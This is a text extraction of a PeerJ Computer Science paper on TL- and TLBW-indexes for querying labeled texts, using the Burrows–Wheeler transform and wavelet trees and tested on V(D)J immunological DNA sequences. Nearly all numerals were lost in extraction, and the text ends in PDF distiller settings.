results: these indexes allow efficient text–label queries to count and find labeled patterns. the tlbw-index has an overhead on simple label queries but is very efficient on combined pattern–label queries. we implemented the indexes in c++ and compared them against a baseline solution on pseudo-random as well as on v(d)j labeled texts. discussion: new indexes such as the ones we proposed improve the way we index and query labeled texts as, for instance, lymphocyte repertoire for hematological and immunological studies. subjects bioinformatics, computational biology, algorithms and analysis of algorithms keywords data structures, text indexing, burrows–wheeler transform, wavelet tree, v(d)j recombination introduction labels are a way to add some information on a text, as the semantics of words on an english sentence or functional annotations such as genes on a dna sequences. can we build an index that saves a labeled text like acgcc : : : ttga (of size ), which have the label l in the positions – and the label l in the positions – ? we consider here the case where a same label can be given to different (but similar) patterns and can occur several times in the text. we introduce two indexes which store a labeled text and answers to position–label association queries. those indexes share some ideas with the rl-fmi (mäkinen & navarro, ) which uses a burrows–wheeler transform (bwt) and a wavelet tree (wt). using a somewhat similar organization, we index a labeled text. the following sections present the tl- and tlbw-indexes (text–label indexes) and their associated queries. the last section presents experimental results on simulated and real genomic data. let t = t t : : : tn - be a text of length n over an alphabet of size s. the text may be composed of several sequences, each sequence ending with the symbol $. let l = {l , l : : : ll - } be a set of labels. a labeled text (t, a) is here a text with non-overlapping labels: a letter should have at most one label. each position i of the text is labeled by exactly one label ai ∈ l ∪ { }, where the special label is put on every letter how to cite this article rocher et al. ( ), indexing labeled sequences. peerj comput. sci. :e ; doi . /peerj-cs. submitted september accepted february published march corresponding authors mathieu giraud, mathieu.giraud@univ-lille.fr mikaël salson, mikael.salson@univ-lille.fr academic editor rahul shah additional information and declarations can be found on page doi . /peerj-cs. copyright rocher et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:mathieu.�giraud@�univ-lille.�fr mailto:mikael.�salson@�univ-lille.�fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ without label. a = a a : : : an - is the label string. figure shows the text which will be used all over this article. given a bit vector b = b[ ]b[ ] : : : b[n - ], where each b[i] is either or , we define as b[i, j] the vector b[i]b[i + ] : : : b[j]. let us call rank(b, i, b) the number of times the bit b ∈ { , } appears in the prefix b[ , i] and select (b, j, b) the position i of the jth appearance of the bit b in b. such a bit vector b can be stored in nh (b) + o(n) bits to support rank and select in o( ), where h (b) is the zeroth order entropy of b (raman, raman & rao, ). the bwt (burrows & wheeler, ) is a reversible algorithm which reorganizes the letters of a text. the transformed text, bwt(t), is the concatenation of the last letters of the lexicographically sorted rotations of the text. bwt(t) is easier to compress and can be stored using nhk(t) + o(n) bits, where hk is the kth order empirical entropy of the text t. the fm-index (ferragina & manzini, ) uses the bwt, a table c, where c[a] gives the number of letters lexicographically smaller than a, and a function occ(a, i) giving the number of occurrences of a in bwt(t)[ , i]. the fm-index allows to efficiently search a pattern using backward search. a wt (grossi, gupta & vitter, ) is a binary tree storing a text, where each symbol from the alphabet corresponds to a leaf. the root is a bit vector where every position corresponds to the element it has to index. any position marked (respectively ) corresponds to an element whose leaf is on the left (respectively right) descendant of the node. the process is repeated recursively until the leaves. for a text a of length a in an alphabet of size l, the construction of a balanced wt needs o a dlog l= ffiffiffiffiffiffiffiffiffiffi log a p e � � time (munro, nekrich & vitter, ) and requires nh (a) + o(a log l) bits when bit vectors are zero-order compressed (navarro & mäkinen, ). the usual full-text indexes such as the fm-index (ferragina & manzini, ) or the lz-index (kärkkäinen & ukkonen, ) do not index labeled texts. some recent researches allow bidimensional range queries: arroyuelo et al. ( ) represent an xml tree structure as a compressed bit vector and allow queries on structured patterns. we focus here on non-overlapping labels and look for ways to efficiently store such labels along with sequences as well as to query them. the basic idea is that consecutive labels in a are often the same: we will thus store compressed label sequences. materials and methods tl-index: indexing labels over a text given a labeled text (t, a), we define the tl-index as, using a fm-index built on a bwt u to index the text, a bit vector ba marking the positions in the text where the labels change, and a wt wa indexing a compressed label sequence (fig. a). a a c a g c $ a t c a a c $ a g c t t t $ l . l l l . l figure the text t = aacagc$atcaac$agcttt$, with three sequences, is labeled with the label string a = l . l . l . l l l l l l l . l . l . l l l . full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bwt u. let u = u u : : : un - be the bwtof t = t t : : : tn - . as usually done, the fm-index samples every log + n values of a suffix array to retrieve the text positions of any occurrence (navarro & mäkinen, ). a′ l . l e l l . e l e wa q e q l q l q l . l . u c c t c $ a a c $ $ g a t a g a a t a t c t a a c a g c $ a t c a a c $ a g c t t t $ a l . l . l . l l l ε l l l l . l . l . e l l l e e e e ba a d′ l l . e l e l . l . e l l . l l . l e l e l wd q ε q l q l q l . l . u d bd c l c l . t e c l $ e a l . a l . c l . $ e $ e g l a l . t l a l . g l a l a l t e a l t e c l b figure tl- and tlbw-indexes store a text of length with four unique labels. (a) tl-index. the wt wa has four internal nodes and five leaves. we have ba[ ] = because a = a = l , and ba[ ] = because a s a . the label a = l is thus stored in a′, at position , hence w〈 〉= a′ = l . a′ has two occurrences of the label l : w - 〈l 〉= { , }, corresponding to the six positions { , , , , , } in a. (b) tlbw-index. the root of the wt d′ is now built in the order of the bwt u. the wt wd has four internal nodes and five leaves. the label d = l . is stored in d′, at position , hence w〈 〉= d′ = l . . d′ has two occurrences of the label l . : w - 〈l . 〉= { , }, corresponding to the three positions { , , } in u. in both cases, the label sequences (a, d) and the compressed label sequences (a′, d′) are not stored in the indexes. full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bit vector ba. let ba a compressed bit vector of length n such that ba[ ] = , and, for i � , ba[i] = if ai = ai - , and otherwise ba[i] = . wavelet tree wa. let a′ =〈ai j ba[i] = 〉. a′ = a′ a′ : : : a′ a - is called the compressed label sequence. it is a subsequence of a, of length a, containing only the changing labels according to the positions in a. the compressed label sequence a′ is stored using a wt wa. wa is defined as (q, q ), where q is the set of nodes of wa and q ∈ q is the root node. each node q ∈ q is q = (q.val, q.label, q.left, q.right, q.parent), where q.label ∈ l ∪ { } is the label of q and q.parent is the parent node of q (q .parent being the null value ⊥). both q.left and q.right are child nodes in q ∪ {⊥}. a leaf is a node q where q.right and q.left are ⊥. each leaf q is linked to a label q.label ∈ l ∪ { }. the l + leaves are exactly the labels of l ∪ { } and we define leaf (q.label) = q. on a leaf q, we have q.val = ⊥. let q be a non-leaf node: we have q.label = q.val is the bit vector rooted at q in the wt. we explain in “shaping the wt for a label hierarchy” how wa can be further shaped depending on a label hierarchy. wa is part of the index. this wt is used to answer efficiently bidimensional range queries where the labels and the label positions are the two dimensions (mäkinen & navarro, ). a balanced wt has a height of log l, with l, the number of leaves. the accessor w〈i〉returns a′i, in o(log l) time. this is a classical query within a wt. given a label lx ∈ l, the function selectw〈lx, i〉gives the position of the ith lx label in a′ in o(log l) time. the accessor w - 〈lx〉gives the list of positions in a′ where a′i = lx. it runs in o(log l � occ) time, with occ the number of occurrences of lx in a′. tlbw-index: indexing labels in the order of the bwt the bwt tends to store text repetitions consecutively. as those repetitions may have the same labels, it would be interesting that the labels benefit from the bwt reordering. hence, labels can also be stored in the order of u. given a labeled text (t, a), the tlbw-index is defined as (u, bd, wd) (fig. b). the bwt u is built in the same way as the tl-index. let d = d d : : : dn - the labels in the order of u. the bit vector bd of size n is such that bd[ ] = , and, for i � , bd[i] = if di = di - , and otherwise bd[i] = . let d′ =〈di j bd[i] = 〉. d′ = d′ , d′ : : : d′d - is a compressed label sequence of length d, subsequence of d. the wt wd now indexes the compressed label sequence d′. the tlbw-index will be slower to build than the tl-index as it needs d. on the other side, as it is aware of the order of letters in the bwt, it will be able to support faster text/label queries. queries the indexes allow the following classical queries. � label(ti) (also called access(ai))—which label is on the letter ti? this query is done is o(log l) time in the tl-index, and in o(log + n + log l) time in the tlbw-index since it has to convert positions in u order (see fig. ). � findp(p) p—which are the occurrences of a pattern p ? it is solved with the fm-index alone (ferragina & manzini, ). this query runs in o(jpj + occ � log + n) time in both indexes, where occ is the number of occurrences of p in t. rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � findl(lx)—which text positions are labeled lx? the query runs in o(y � log l) time in the tl-index, and in o(y(log l + log + n)) time in the tlbw-index, where y = w - 〈lx〉and y = jyj. see fig. . the three previous queries are well known in text indexes. the two next queries search for a pattern and a label at the same time. � countpl(p, lx)—how many text positions are labeled lx and begin an occurrence of a pattern p ? as in the findl(lx) query, the occurrences of p are found in u, in the positions from i to j. tl-index: we translate all these occ occurrences to have the corresponding positions in the text. for each of them, we run the query label(ti). the total time is o(jpj + occ (log n + + log l)). tlbw-index: see algorithm . i and j correspond to the positions i′ = rank( , i, bd) and j′ = rank( , j, bd) in the root q of wd. we then use an accessor customized from the rangelocate function of (mäkinen & navarro, ), simulating a two-dimensional range query on [lx, lx] � [i′, j′] in wd to give the set of positions z = {z j a′z = lx and i′ � z � j′ } in o(jzj � log l) time. this accessor first traverses the wt from the root to the leaf lx and then traverses it back to the root to find the positions in q .val which match the label in the given range. for every position found, we find the corresponding positions in bd and expand them to the following -bits in bd. this query runs in o(jpj + jzj � log l) time. � findpl(p, lx)—which text positions are labeled lx and begin an occurrence of a pattern p? tl-index: this query is exactly the same as countpl(p, lx). wd q e q l q l q l . l . u bd c c t c $ a a c $ $ g a t a g a a t a t c figure finding the label of a letter in a tlbw-index. the letter u corresponds to a -bit in bd. the previous -bit in bd is the bit at position . it’s the th -bit of bd, it corresponds to the bit at position in wd’s root, which label is w〈 〉= l . . full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tlbw-index: we use the countpl(p, lx) query detailed in algorithm , replacing the counter cnt with a list y holding the matching positions in u. the positions are converted at the end in the text order. this query runs in o(jpj + jzj � log l + y � log + n) time, with jyj = y. algorithm countpl(p, lx): count the positions starting a pattern p and labeled with lx (i,j) from findp(p) ▹ starting and ending positions of occurrences of p in u i′ = rank( , i, bd) j′ = rank( , j, bd) c = path(lx) ▹ bit vector representing the path from the root to leaf(lx) node = q for p in to jcj - do ▹ loop corresponding to rangelocate in (mäkinen & navarro, ) i′ = rank(c[p], i′ - , node.val) j′ = rank(c[p], j′, node.val) - node = (c[p] == )? node.left : node.right if i′ > j ′ then return cnt = for k in i′ to j′ do k′ = selectw〈lx, rank(c[jcj - ], k, node.val)〉 ▹ ith lx label in a′ i″ = select( , k′, bd) j″ = select( , k′ + , bd) cnt = cnt + j″ - i″ ▹ positions [i″, j″ - ] in u taken into account return cnt wd q e q l q l q l . l . u bd c c t c $ a a c $ $ g a t a g a a t a t c figure finding the letters which have a l . label in a tlbw-index. y = w - 〈l . 〉= { , }. for every bit of y, we access to the -bit corresponding in bd ({ , }), and all the -bits which follow it ({ }). the corresponding letters of u are labeled l . , at positions { , , }. full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as jzj � y � occ, the countpl() and the findpl() queries may thus be faster on the tlbw-index, jzj depending of the compression bd can do on y. note that the countpl(p, lx) query could be faster if the wt was directly built on the labels, without the intermediate bit vector bd (ba): the answer would be known while reaching the leaf of the wt in o(jpj + log l) time. we chose to favor the execution time of the findpl(p, lx) query, as well as the size of the structure (when a can be compressed). the findpl(p, lx) can vary to find the patterns p which have the label lx on the ith position of the pattern, or in any pattern’s position. adapting this queries is easy in the tl-index as we find the positions of the pattern in the bwt, translate them in the text order and then find the label of the ith position following each of them. in the tlbw-index, we find the patterns’ positions in the bwt, access to the ith letter (we need to sample the bwt to read the patterns in the forward way), and find the label as usual. to have the label in any pattern’s position, in the tl-index we need to find a label lx between the first and last letter of the pattern (with only two access in the wt) but in the tlbw-index, we look for the label of all the pattern’s letters. construction and space we recall that the text (t, a) is of length n and is labeled with l unique labels. as defined above, the indexes store u in nhk(t) + o(n) bits. the tl-index stores the bit vector with rank and select capabilities in nh (ba) + o(n) bits. the size of wa depends on the compressed label sequence a′, of length a. wa takes a h (a′) + o(a log l) bits. similarly, the tlbw-index stores bd in nh (bd) + o(n) bits and wd takes d h (d′) + o(d log l) bits, where d is the length of d′. the bwt can be built in linear time while using little space (belazzougui et al., ; munro, navarro & nekrich, ). ba is built while reading a in o(n) time. to make bd, we need to read the labels in the order of the original data file in o(n) time. to make wa, we find the occurrence of each label, corresponding to a -bit in ba, in o(a) time. then we form the shape of wa in o(l). the labels corresponding to a -bit are extracted to make the wt’s root q . for each node containing at least two labels, we separate them by following the shape previously calculated, in o a log l= ffiffiffiffiffiffiffiffiffiffi log a p� �� � . we build wd the same way. the tl-index has thus a size of nhk(t) + nh (ba) + a h (a′) + o(n log l) bits, assuming s = o(l), and is built in o n þ l þ a log l= ffiffiffiffiffiffiffiffiffiffi log a p� �� � time. the tlbw-index has a size of nhk(t) + d h (d′) + o(n log l) bits and is built in o n þ l þ d log l= ffiffiffiffiffiffiffiffiffiffi log d p� �� � time. shaping the wt for a label hierarchy labels may be further organized into a label hierarchy, given an additional set f = {f , : : : , ff - } of label families (fig. a). both tl- and tlbw-indexes can be adapted: the wt w (either wa or wd) will be shaped according to the hierarchy, and internal nodes q of w may have non-empty q.label values belonging to f. for example, in fig. b, one can set on either index q .label = l , where l is the label family gathering l . , l . and l . . the findl() and findpl() queries naturally extend to label families. with the hierarchy depicted in fig. , findl(l ) has to find the positions that have a label l . , l . or l . . rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ such a query does not need to be iterated on every label of the family l , but rather directly starts at the corresponding internal node (q on fig. b). shaping w for a label hierarchy may increase the height w of the wt to o(l) in the worst case. to have a lower space consumption and a faster average query time, one can give a huffman shape to w (huffman, ). a leaf which corresponds to a frequently used label will be higher in the tree than a leaf of a rarely used label. depending on the label hierarchy, the average height of the tree is h (a′) in the best case while in the worst case it could be o(l). if no label hierarchy is given, the average height w will be h (a′) (mäkinen & navarro, ). results and discussion ht-index: a baseline index we compared the tl- and tlbw-indexes with a baseline solution called ht-index, indexing the text t with a bwt. the labels are stored in a map linking each label to the list of its (start,end) positions. we also store the labels in the text order with the compressed bit vector ba and, stored in plain form, a′. this enables the findl(lx) query in o(y), where y′ is the list of pairs (start,end) which represent the occurrences and y = jy′j. note that y (in the tl-index) and y′ represent the same information as the labels are stored in the text order in both indexes. the label(ti) query runs in o( ) time. this solution is not space-efficient with repeated labels: it needs nhk(t) + nh (ba) + a + l′ + o(n) bits, where a is the size of a′ and l′ the number of labeled factors. the query times are summarized in table . evaluation procedure the three indexes were implemented in c++. we used the sdsl-lite library (gog et al., ) to build the bit vectors and the wt. we used the ropebwt library (li, ), which builds a bwt in o(n log n) time on small dna sequences, as it is very efficient for storing and appending sequences corresponding to our projected application (cox et al., ). as ropebwt does not sample the suffix array, we iterate over the text until we find a $ symbol. to have results close to the usual fm-index sampling in o(log + n) steps, we use sequences of length , which is similar to the sampling distance usually chosen in practice. the real files have longer sequences, thus longer sampling distances. the queries relying on the bwt will be slower and therefore cannot be compared between real and simulated files. we build the ba (or bd) bit vectors, compress them using the rrr_vector l l l . l . l . l a l . l . l . l q : family l q : family l b figure a label n-ary hierarchy (a) can be represented with a binary tree shaping the wavelet tree (b). the label family l has here three descendants, l . , l . and l . . full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ class of sdsl-lite, and finally build wa (or wd) using a shape we added in sdsl-lite, which depends of the label hierarchy. we evaluated the build time, the index size, as well as the run time of three of the queries detailed in “queries”—findp(p) behaving similarly in all indexes and countpl(p, lx) being very similar to findpl(p, lx). the three indexes were tested on various datasets of labeled texts, each with m characters (table ). datasets and code are available at http://www.vidjil.org/data/# -peerjcs. � simulated files with random sequences and random labels. all sequences and labels are random (d ∼ . n). � simulated files, with random sequences but fixed labels. here a given label is associated to the same pattern, possibly with some variation, and we alter the proportion of labeled letters ( – %), the variation in the label’s pattern ( – %, more variations giving random labels), the number of unique labels ( – , ), the length of the labels ( – letters). the dataset has files, two of those files are shown in table . � genomic sequences with immunologic labels. a person’s immune system can be described with a set of labeled dna sequences with v(d)j recombinations. the dataset, detailed below, uses k labels from unique labels, with d ∼ . n. a dataset of dna sequences with immunologic labels the adaptive immunity is the mechanism thanks to which our body defends itself against infections. when b and t-cells, or lymphocytes, are under maturation, their dna undergo a recombination which allows several billions possibilities from a register of a thousand genes (tonegawa, ). for example, the v(d)j recombination v � /acgt/ j � means that the dna sequence is composed from the v � gene without the four last letters, then the acgt sequence, then the j � gene. a person’s immune system can thus be described with a set of labeled dna sequences encoding v(d)j recombinations (fig. ). these sequences can be sampled by next- generation sequencing with bioinformatics analysis (bystry et al., , duez et al., ). the tested dna sequences come from patients , , and from a public dataset on a study on acute lymphoblastic leukemia (salson et al., ). they have m letters table query time complexities for ht-index, tl-index and tlbw-index. requests ht-index tl-index tlbw-index label(i) o( ) o(log l) o(log + n + log l) findp(p) o(jpj + occp � log + n) findl(lx) o(y) o(y � log l) o(y � (log l + log + n)) countpl(p, lx) o(jpj + occp � log + n) o(jpj + occp � (log + n + log l)) o(jpj + jzj � log l) findpl(p, lx) o(jpj + jzj � log l + y � log + n) note: note that we have jzj � y � occp. the label(i) and findl(lx) queries are faster in the ht-index and the tl-index as the ht-index needs a sampling time. however, the countpl(p, lx) and findpl(p, lx) are faster in the ht-index. rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.vidjil.org/data/# -peerjcs http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and k labels from unique labels, making a mb file. each dna sequence has between and letters and two or three labels, each label having a size between and letters (fig. ). for a given label, the labeled subsequences may vary up to % due to amplification and sequencing errors. results index sizes. the table shows the results. as expected, the size of u, b (either ba or bd) and w (either wa or wd) grows linearly with the number of indexed elements (data not shown). the tl-index is the smallest index, and the tlbw-index is generally slightly larger. the compression is directly related to a and d. the file with random labels (d = . n) is hard to compress, whereas the files with a low d/n ratio give a � to � compression. figure further shows how these sizes vary: as expected, the indexes are larger when there are less consecutive identical labels in t or in u, thus more -bits in b. table size, build and query times of three indexes indexing labeled texts, on three simulated files and on a genomic dna sequence file with immunologic labels. random fixed # fixed # genomic sequence size lab. (t/u) . m / , m / m / k / lab. avg size . . lab. letters (%) variation (%) ?? a = : : : /d = : : : . n/ . n . n/ . n . n/ . n . n/ . n tl tlbw ht tl tlbw ht tl tlbw ht tl tlbw ht size (mb) time (s) . . . . . . label(ti) (ms) . . . . . . . . . . . . findl(l) (ms/l) . . . . . . . . . . . findpl(p, l) (s) . . . . . . . . . . . . notes: all files have m characters, and differ by the number of total and unique labels (“lab (t/u)”) and their size (“lab. avg size”), by the ratio of labeled letters (“lab. letters”), and by the variation between sequences labeled by the same label (“variation”). queries use patterns p with three letters. times were averaged on m launches (label()) or at least five launches (other queries). times for findl(l) are reported per letter. best or close-to-the-best results are in bold. a g g t c a a t a c g a t g a c t g g g g t c a g c t c a t a c g t c a g g a g g v - * v - * d * j - * j - * d: to v: to j: to sequence: to figure v(d)j recombinations. the first sequence is an immunoglobulin “light chain,” that is a vj recombination with two labels (one v gene, positions – , and one j gene, positions – ). the second sequence is a “heavy chain,” that is a v(d)j recombination. full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ note that when there are more labeled letters, the text is more similar (as labels are placed on similar substrings), hence a decrease in the bwt size (a, c). w increases while the number of unique labels increases (d), the height of w increasing logarithmically with the number of unique labels. build time. most of the build time of tlbw-index is devoted to build d′. for tl-index, the building of u takes most of the total time. >trgv * : - trgj * : - ggaaggccccacagcgtcttcagtactatgactcctacaactccaaggttgtgttggaa (...) >ighv - * : - ighd - * : - ighj * : - ggaggtccctgagactctcctgtgcagcctctggattcaccttcagtgactactacatg (...) figure two annotated sequences from the dataset. full-size doi: . /peerj-cs. /fig- a b dc ht-index tl-index bwt ht-index tl-index tlbw-index bwt ht-index tl-index tlbw-index bwt ht-index tl-index tlbw-index bwt tlbw-index figure size of the indexes and size of the underlying bwt in the files with fixed labels. the additional size in tl- and tlbw-indexes mostly depends from the size of the compressed label sequences a′ and d′. they grow when there are more labeled letters (a), more variation in the labels (b), or when the number of distinct labels increase (d). note that when all the letters are labeled (a, %), there is a small decrease in the index size because there is no random letters between the patterns. the indexes shrink when the labels grow (c), as there are more common suffixes in the label sequences. full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ queries. the label() query is faster on the ht-index. as expected, the tlbw-index needs more time for label() and findl(), as it needs to translate positions from the bwt back to the text. note that locating the positions in the text takes about the same time as label(ti) in the tl-index. however, for the complex findpl(p, l) query, the tlbw-index is the fastest solution because the position translation is only done on the letters which have both the label and the pattern. for the tl-index and ht-index, the actual time of the findpl(p, l) queries is more affected by the number of pattern occurrences than the number of final occurrences (between and k depending on the file). on the genomic dataset, the sequences are longer: the tlbw-index suffers here even more from the missing suffix array sampling of the implementation for queries label() and findl(). however, on the findpl(p, l) query, the other indexes are penalized due to the sparsity of the sampling, bringing a more than � difference with tlbw-index. conclusion the tl-index and tlbw-index store a labeled text and allow efficient queries. they can be constructed from files of some mb in a few seconds. experiments confirm that the indexes stay small when the text is redundant (thus a smaller u), when each label describes a pattern with few variations (many -bits in b, thus a smaller w), and when few letters are labeled (thus a small w). however, the tl-index and tlbw-index are robust even to non- redundant text with almost random labels everywhere. the tlbw-index needs more memory space than the tl-index but is more efficient in combined label/pattern queries. those structures might be used on any labeled data, such as dna sequences, but also on natural language texts or on music sheets with some semantic annotations. perspectives include improvement of the implementation, with label families queries or parameterizing the distance between samples in the fm-index to offer a space-time trade off. within sdsl we could use the sd_vector bit vector instead of the rrr_vector bit vector which should improve space consumption when the bit vectors are very sparse. however, this would only minimally improve the global space consumption of the index. we plan to use one of the indexes in a clone database for hematological malignancies: it will allow comparison of v(d)j recombinations between different samples of a patient or between several patients. acknowledgements we thank anonymous reviewers for their insightful comments on earlier versions of this article, as well as the euroclonality-ngs consortium for insightful discussions. additional information and declarations funding this work was supported by université de lille, siric oncolille, and région hauts-de- france. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant disclosures the following grant information was disclosed by the authors: université de lille, siric oncolille, and région hauts-de-france. competing interests the authors declare that they have no competing interests. author contributions � tatiana rocher conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. � mathieu giraud conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper. � mikaël salson conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper. data availability the following information was supplied regarding data availability: code and data are available as supplemental dataset files and from http://www.vidjil. org/data/# -peerjcs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references arroyuelo d, claude f, maneth s, mäkinen v, navarro g, nguyen k, sirén j, välimäki n. . fast in-memory xpath search using compressed indexes. software: practice and experience ( ): – doi . /spe. . belazzougui d, cunial f, kärkkäinen j, mäkinen v. . linear-time string indexing and analysis in small space. arxiv preprint. available at http://arxiv.org/abs/ . . burrows m, wheeler dj. . a block-sorting lossless data compression algorithm. digital equipment corporation. src research report, . available at http://www.hpl.hp.com/ techreports/compaq-dec/src-rr- .pdf. bystry v, reigl t, krejci a, demko m, hanakova b, grioni a, knecht h, schlitt m, dreger p, sellner l, herrmann d, pingeon m, boudjoghra m, rijntjes j, pott c, langerak aw, groenen pjta, davi f, brüggemann m, darzentas n. . arrest/interrogate: an interactive immunoprofiler for ig/tr ngs data. bioinformatics ( ): – doi . /bioinformatics/btw . cox aj, bauer mj, jakobi t, rosone g. . large-scale compression of genomic sequence databases with the burrows–wheeler transform. bioinformatics ( ): – doi . /bioinformatics/bts . duez m, giraud m, herbert r, rocher t, salson m, thonier f. . vidjil: a web platform for analysis of high-throughput repertoire sequencing. plos one ( ):e doi . /journal.pone. . rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://www.vidjil.org/data/# -peerjcs http://www.vidjil.org/data/# -peerjcs http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /spe. http://arxiv.org/abs/ . http://www.hpl.hp.com/techreports/compaq-dec/src-rr- .pdf http://www.hpl.hp.com/techreports/compaq-dec/src-rr- .pdf http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /bioinformatics/bts http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ferragina p, manzini g. . opportunistic data structures with applications. in: foundations of computer science (focs ). piscataway: ieee, – . available at https://people.unipmn. it/manzini/papers/focs draft.pdf. gog s, beller t, moffat a, petri m. . from theory to practice: plug and play with succinct data structures. in: symposium on experimental algorithms (sea ). – . grossi r, gupta a, vitter j. . high-order entropy-compressed text indexes. in: symposium on discrete algorithms (soda ). – . new york: acm. huffman da. . a method for the construction of minimum-redundancy codes. proceedings of the ire ( ): – . kärkkäinen j, ukkonen e. . lempel-ziv parsing and sublinear-size index structures for string matching. in: south american workshop on string processing (wsp ). li h. . fast construction of fm-index for long sequence reads. bioinformatics ( ): – doi . /bioinformatics/btu . mäkinen v, navarro g. . run-length fm-index. in: proceedings of the dimacs workshop: the burrows-wheeler transform: ten years later. – . mäkinen v, navarro g. . succinct suffix arrays based on run-length encoding. in: combinatorial pattern matching (cpm ). – . mäkinen v, navarro g. . rank and select revisited and extended. theoretical computer science ( ): – doi . /j.tcs. . . . munro ji, navarro g, nekrich y. . space-efficient construction of compressed indexes in deterministic linear time. in: symposium on discrete algorithms (soda ). – . munro ji, nekrich y, vitter js. . fast construction of wavelet trees. theoretical computer science : – doi . /j.tcs. . . . navarro g, mäkinen v. . compressed full-text indexes. acm computing surveys (csur) ( ): doi . / . . raman r, raman v, rao ss. . succinct indexable dictionaries with applications to encoding k-ary trees and multisets. in: symposium on discrete algorithms (soda ). – . salson m, giraud m, caillault a, ferret y, duployez n, duez m, sebda s, quief s, villenet c, figeac m, preudhomme c, grardel n. . high-throughput sequencing in acute lymphoblastic leukemia: follow-up of minimal residual disease and emergence of new clones. leukemia research : – doi . /j.leukres. . . . tonegawa s. . somatic generation of antibody diversity. nature ( ): – doi . / a . rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://people.unipmn.it/manzini/papers/focs draft.pdf https://people.unipmn.it/manzini/papers/focs draft.pdf http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /j.tcs. . . http://dx.doi.org/ . /j.tcs. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.leukres. . . http://dx.doi.org/ . / a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ indexing labeled sequences introduction materials and methods results and discussion conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false 